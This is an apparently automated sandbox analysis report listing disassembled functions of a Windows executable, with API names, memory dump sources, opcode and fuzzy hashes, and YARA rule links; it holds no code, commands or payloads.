                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                  • Instruction ID: b019bdf3476ce867fce2c923c33156472654b06152447cb0e559d04746cdba66
                                                  • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                  • Instruction Fuzzy Hash: 5C316F32618B8186EB648F65FC512AE73A0FB88755F540139EADD83B99DF3CD546CB00
                                                  Function 00007FF6CA9C1AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: e3d741568b9ceeed1bb51d0fe396fe018f9d7fc5d1e3193d8a2ec51d497700c7
                                                  • Instruction ID: 9728cee1b89f12023f79a8a2184f5de9b757a23442cc2973564823e6066c5b9e
                                                  • Opcode Fuzzy Hash: e3d741568b9ceeed1bb51d0fe396fe018f9d7fc5d1e3193d8a2ec51d497700c7
                                                  • Instruction Fuzzy Hash: 90B1D332B24A8685EB10AF65E8662ED2371FF85789F501275EA8DC3B9ADF3CD540C304
                                                  Function 00007FF6CA9FFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CA9FFAC4
                                                    • Part of subcall function 00007FF6CA9F7934: GetCurrentProcess.KERNEL32(00007FF6CAA00CCD), ref: 00007FF6CA9F7961
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                  • String ID: *?$.
                                                  • API String ID: 2518042432-3972193922
                                                  • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                  • Instruction ID: e9c538e173386db847be3de76c06ac5169d0325aa8bf39c9a71a35c6206dfc92
                                                  • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                  • Instruction Fuzzy Hash: DF51F662B25A9541EF10DFA1AC220BC77A4FB44BD9B444579EE9ED7B86EF3CD0428300
                                                  Function 00007FF6CAA02080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: memcpy_s
                                                  • String ID:
                                                  • API String ID: 1502251526-0
                                                  • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                  • Instruction ID: b19a6abf79ab3cf30380ad83e561e562edb02d3a901e5450d188dd188a9ef562
                                                  • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                  • Instruction Fuzzy Hash: A1D1A032B183C687DB24CF55F19466AB6A1FB98785F148134CB8F97B44DE3DE8468B00
                                                  Function 00007FF6CA9CB6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                  • String ID:
                                                  • API String ID: 1365068426-0
                                                  • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                  • Instruction ID: 8dbaf0c3848696116701efc4805ffeb399a72890998284ff6fc9bcd9b114219c
                                                  • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                  • Instruction Fuzzy Hash: C2014F7171CB8282EB549F62B86517A7391FB8ABC6F084074EACEC7B45CE3CD5058B04
                                                  Function 00007FF6CA9FFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                  • Instruction ID: efa171a7dc90c568dae63b7a0cd9386ae1ea874f4e0ca32b621f0c6d50f9cecc
                                                  • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                  • Instruction Fuzzy Hash: 8E310B22B2869145F7209F36BC157B97A91AB94BE4F148279EEADC7BC7CE3CD5018300
                                                  Function 00007FF6CAA05AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise_clrfp
                                                  • String ID:
                                                  • API String ID: 15204871-0
                                                  • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                  • Instruction ID: e340ac78efc0fadfadf4ffc66805018743afec96c209bd385c5beb2e80b09428
                                                  • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                  • Instruction Fuzzy Hash: 7FB16D73600B8A8BEB19CF29D85636C3BA0F744B49F15C962DA9E877A4CF39D452C700
                                                  Function 00007FF6CA9EA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FormatInfoLocaleNumber
                                                  • String ID:
                                                  • API String ID: 2169056816-0
                                                  • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                  • Instruction ID: b6d3f29213e6739ab374bd5370cbf5e6a27fbabbce6c4ab400b66b24649d4cdb
                                                  • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                  • Instruction Fuzzy Hash: 6411DF32A18B8195E3258F51F8213F97360FF88B85F804176DA8D83664DF3CD146CB44
                                                  Function 00007FF6CA9D126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D24C0: CreateFileW.KERNELBASE ref: 00007FF6CA9D259B
                                                    • Part of subcall function 00007FF6CA9D24C0: GetLastError.KERNEL32 ref: 00007FF6CA9D25AE
                                                    • Part of subcall function 00007FF6CA9D24C0: CreateFileW.KERNEL32 ref: 00007FF6CA9D260E
                                                    • Part of subcall function 00007FF6CA9D24C0: GetLastError.KERNEL32 ref: 00007FF6CA9D2617
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9D15D0
                                                    • Part of subcall function 00007FF6CA9D3980: MoveFileW.KERNEL32 ref: 00007FF6CA9D39BD
                                                    • Part of subcall function 00007FF6CA9D3980: MoveFileW.KERNEL32 ref: 00007FF6CA9D3A34
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 34527147-0
                                                  • Opcode ID: 820f54f5ecf705f04b13670ba967b2039b24beb0e250efc8748d6bebb935f937
                                                  • Instruction ID: f0f0305b26bccd78a1e0313ecd57afdbaa3050179f818a8ada01c21d0677a7cd
                                                  • Opcode Fuzzy Hash: 820f54f5ecf705f04b13670ba967b2039b24beb0e250efc8748d6bebb935f937
                                                  • Instruction Fuzzy Hash: 1991C023F28A4282EA10DF66E4662AE6361FB54BC5F504076EE8DD7B96DF3CD585C300
                                                  Function 00007FF6CA9E8DF4 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ObjectRelease$CapsDevice
                                                  • String ID:
                                                  • API String ID: 1061551593-0
                                                  • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                  • Instruction ID: 9973414fa7fbf8b60882b34bbe1f1995d0271443d0d15f4cd6c1db9db2db8cef
                                                  • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                  • Instruction Fuzzy Hash: 15816F32B18A4586EB20CFAAE4556AC7771FB88B89F004176DE4ED7725DF38E145C380
                                                  Function 00007FF6CA9D4EB0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Version
                                                  • String ID:
                                                  • API String ID: 1889659487-0
                                                  • Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                  • Instruction ID: 655b555e190385739fabde28a40f97404ecf187e140451afb6f92eb06b16873f
                                                  • Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                  • Instruction Fuzzy Hash: 35018471D5D58289FA718F65B83A3B523905BE9307F4402B4D5DDC72A2CE3DA489CA04
                                                  Function 00007FF6CA9F8C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: 0
                                                  • API String ID: 3215553584-4108050209
                                                  • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                  • Instruction ID: cc5c6977c20ed0fab007959e4181686a65109dc757e7dc6711ce40aed3f34ccf
                                                  • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                  • Instruction Fuzzy Hash: B2811722A3910242EBE89E15BC6A67D23D0EF50746F1494B9FD89C769BCF3DE802C340
                                                  Function 00007FF6CA9F89A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: 0
                                                  • API String ID: 3215553584-4108050209
                                                  • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                  • Instruction ID: a03ac53d26bba5f27fc27a06b4fc3105684356de419f09e04d54c1b9a7d44c49
                                                  • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                  • Instruction Fuzzy Hash: E9712911A3C24246FBE48E197C6A27D2390DF41746F1495BEFDC9CB687CE2DE8468741
                                                  Function 00007FF6CA9DC96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: gj
                                                  • API String ID: 0-4203073231
                                                  • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                  • Instruction ID: 0a5e52077a3c661b30933d9d2621fe10a39e13e3f08566596d97fddae8bfbf76
                                                  • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                  • Instruction Fuzzy Hash: 34518137B286908BD714CF25E411A9AB3A5F388758F455126EF8A93B05CB39E945CF40
                                                  Function 00007FF6CA9FC838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                  • Instruction ID: 81c246f6ad73d1afd7d96665d2c78442644ea5e983717237cf35e4e7a1bd1f05
                                                  • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                  • Instruction Fuzzy Hash: CA41C322724A44C5EF44CF6AE8651A973A1B758FD4B499036EF8DC77A5DE3CD482C340
                                                  Function 00007FF6CAA00D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                  • Instruction ID: 0de2881c0351a0951889220f539803fd76194f26eb135b85e0f3f21b6f3cd58b
                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                  • Instruction Fuzzy Hash: D2B09220E17A42C2EA0C2F927CAA25423A4BF88B02F9490B8C18D82320DE2C20B64705
                                                  Function 00007FF6CA9E3964 Relevance: .9, Instructions: 931COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                  • Instruction ID: 9c63a69134795beb1645287cee17ec02e90b99d0c814f385d2a218ff957c7115
